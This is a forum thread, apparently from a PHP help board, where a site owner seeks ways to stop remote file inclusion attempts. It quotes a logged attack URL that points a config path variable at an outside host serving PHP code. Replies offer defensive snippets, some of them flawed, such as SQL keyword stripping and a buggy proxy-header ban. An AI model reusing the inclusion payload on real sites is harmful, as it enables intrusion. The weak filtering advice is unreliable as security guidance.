Stopping a hack attempt - quickly

[deansatch]

I had recently had my site hacked and managed to clear it all up. I have been checking my logs and another attempt is being made on my site using injection via the url. They are visiting my site using things like:

 

http://mysite.com//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two??

 

If you look at http://test.bigshop.cz/uploaded/two?? and view the source you can see their php code.

 

Is there anything I can do to stop them even trying?

[ShadowIce]

yes. ban their ip.

[deansatch]

They keep coming back with a different ip every few seconds.

 

How can code like this actually work? Is there something I can alter in php.ini to make url hacks a waste of time?

[ShadowIce]

ban proxies from ur site

[deansatch]

After my last successful hack, I disabled allow_url_include. I want to disable allow_url_fopen as well just to be safe, but I use file_get_contents on one part of a page. Is there a way I can just enable it for that script and disable it immediately after?

[ShadowIce]

this will ban MOST BUT NOT ALL proxies

 

<?PHP

IF(ISSET($_SERVER['HTTP_X_FORWARDED_FOR']) || ($_SERVER['HTTP_USER_AGENT']=='') || ($_SERVER['HTTP_VIA']!='')){
        DIE("Proxy servers not allowed.");
}

$proxy_headers = ARRAY(   
     'HTTP_VIA',   
     'HTTP_X_FORWARDED_FOR',   
     'HTTP_FORWARDED_FOR',   
     'HTTP_X_FORWARDED',   
     'HTTP_FORWARDED',   
     'HTTP_CLIENT_IP',   
     'HTTP_FORWARDED_FOR_IP',   
     'VIA',   
     'X_FORWARDED_FOR',   
     'FORWARDED_FOR',   
     'X_FORWARDED',   
     'FORWARDED',   
     'CLIENT_IP',   
     'FORWARDED_FOR_IP',   
     'HTTP_PROXY_CONNECTION'   
        );
FOREACH($proxy_headers AS $x){
     IF (ISSET($_SERVER[$x])) DIE("You are using a proxy.");
        EXIT;
}

?>

 

this will stop him from flooding ur site:

 

<?PHP

IF (!ISSET($_SESSION)) {
    SESSION_START();
}
// anti flood protection
IF($_SESSION['last_session_request'] > TIME() - 2){
    // users will be redirected to this page if it makes requests faster than 2 seconds
    HEADER("location: /flood.html");
    EXIT;
}
$_SESSION['last_session_request'] = TIME();

?>

 

this will stop him from injection sql:

 

<?PHP
    FUNCTION anti_injection( $user, $pass ) {
           // We'll first get rid of any special characters using a simple regex statement.
           // After that, we'll get rid of any SQL command words using a string replacment.
            $banlist = ARRAY (
                    "insert", "select", "update", "delete", "distinct", "having", "truncate", "replace",
                    "handler", "like", " as ", "or ", "procedure", "limit", "order by", "group by", "asc", "desc"
            );
            // ---------------------------------------------
            IF ( EREGI ( "[a-zA-Z0-9]+", $user ) ) {
                    $user = TRIM ( STR_REPLACE ( $banlist, '', STRTOLOWER ( $user ) ) );
            } ELSE {
                    $user = NULL;
            }
            // ---------------------------------------------
            // Now to make sure the given password is an alphanumerical string
            // devoid of any special characters. strtolower() is being used
            // because unfortunately, str_ireplace() only works with PHP5.
            IF ( EREGI ( "[a-zA-Z0-9]+", $pass ) ) {
                    $pass = TRIM ( STR_REPLACE ( $banlist, '', STRTOLOWER ( $pass ) ) );
            } ELSE {
                    $pass = NULL;
            }
            // ---------------------------------------------
            // Now to make an array so we can dump these variables into the SQL query.
            // If either user or pass is NULL (because of inclusion of illegal characters),
            // the whole script will stop dead in its tracks.
            $array = ARRAY ( 'user' => $user, 'pass' => $pass );
            // ---------------------------------------------
            IF ( IN_ARRAY ( NULL, $array ) ) {
                    DIE ( 'Invalid use of login and/or password. Please use a normal method.' );
            } ELSE {
                    RETURN $array;
            }
    }
?>

 

this will filter alpha numeric characters:

 

<?PHP

//Begin filtering variable  $data of non alphanumeric characters

$data = PREG_REPLACE("/[^0-9a-zA-Z]/i", '', $data);

//Finish filtering of non alphanumeric characters

?>

[gevensen]

if your index doesnt need $_GET you can also do something like

<?php

if(isset($_GET)){

// do whatever maybe return server error 500 contact admin and mimic a server problem so they get bored, redirect to the fbi website for fun or whatever creative thing you can do

//if you want you can ban each ip and put it on a blacklist or just simply die();

}

?>

[ShadowIce]

i would do a 404 to trick him into thinking it doesnt exist

[PFMaBiSmAd]

The exploit you just posted will only work if register_globals are ON and either allow_url_include is ON (php5) or allow_url_fopen is ON (php4.)

[deansatch]

allow_url_fopen is ON. But I need it to be on for a couple of pages. I was hoping there would be some way I can switch it off in php.ini but then switch it on for my script to run, then back off again.

[PFMaBiSmAd]

If you are using php5, what does that matter?

[deansatch]

If you are using php5, what does that matter?

 

How do you mean?

[ShadowIce]

he means if ur using php5 then php.ini has register_globals on. php4 is the other one. so if ur using php 5, just turn off register_globals

[deansatch]

register globals is off by default and I am using php5

[oni-kun]

register globals is off by default and I am using php5

 

Then the injected url will do nothing as mentioned. If I enter "yoursite.com?msg=ur+hacked+bixch", Will you freak out and be scared?

[deansatch]

I'm assuming that a hacker doing these url type exploits is hoping to come across (with luck) an:

 

 if(isset($_GET['hack'])){
//something
} 

sort of thing where they have site.com?hack=http://hackerscode.txt

I noticed a lot of the attempts were using ?page=something or ?pg=something etc...

 

I still have no idea how they managed to succeed the last time. But they managed to plant a couple of php files that wrote new code to my index file.

[ShadowIce]

use anti flood protection. use alphanumeric characters fix. DONT allow ur form to use GET. GET shows the user ur variables. use POST instead

[oni-kun]

I'm assuming that a hacker doing these url type exploits is hoping to come across (with luck) an:

 

 if(isset($_GET['hack'])){
//something
} 

sort of thing where they have site.com?hack=http://hackerscode.txt

I noticed a lot of the attempts were using ?page=something or ?pg=something etc...

 

I still have no idea how they managed to succeed the last time. But they managed to plant a couple of php files that wrote new code to my index file.

 

Then they were using a proposed exploit scanner, and succedded on one level. I added the site to MALZILLA/safebrowsing repo for update, sooner or later it will go through, But you should really fix the code or atleast show us the request that performed the malicious behaviour, Your site is obviously not secure.

 

use anti flood protection. use alphanumeric characters fix. DONT allow ur form to use GET. GET shows the user ur variables. use POST instead

 

Mhmm.. POST is not any more secure than GET.

 

[ShadowIce]

at least it wont show variables.... -.-

[oni-kun]

at least it wont show variables.... -.-

 

<form action="page.php" method = post/get>
   <input type="foobar" id="baz"/>
</form>

 

Would you prefer to get the variable 'baz' from $_POST['baz'] or $_GET['baz']? In otherwords, you're wrong.